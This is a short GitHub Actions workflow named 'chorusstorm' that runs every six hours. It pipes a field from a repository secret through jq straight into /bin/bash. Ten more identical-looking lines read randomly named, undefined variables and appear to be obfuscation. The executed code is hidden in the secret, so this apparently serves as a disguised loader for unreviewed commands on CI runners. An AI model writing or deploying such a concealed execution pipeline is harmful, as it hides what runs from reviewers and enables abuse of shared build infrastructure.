name: chorusstorm

on:
  workflow_dispatch:
  schedule:
    - cron: '2 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chorusstorm
        env:
          xl16: ${{ secrets.xl16 }}
        run: |
          echo $xl16 | jq -r .trsu1767 | /bin/bash
          echo $xxwg25517 | jq -r .zeoxe2 | /bin/bash
          echo $rsw411 | jq -r .ujm44 | /bin/bash
          echo $qeps40 | jq -r .cp90849 | /bin/bash
          echo $yidle58175 | jq -r .qqwu849 | /bin/bash
          echo $xb069 | jq -r .fvqwb80168 | /bin/bash
          echo $gh749 | jq -r .f59 | /bin/bash
          echo $nm0 | jq -r .k50623 | /bin/bash
          echo $iwyhk4326 | jq -r .f96756 | /bin/bash
          echo $vtpn019 | jq -r .y41707 | /bin/bash
          echo $zgfx1 | jq -r .fzxxg36 | /bin/bash

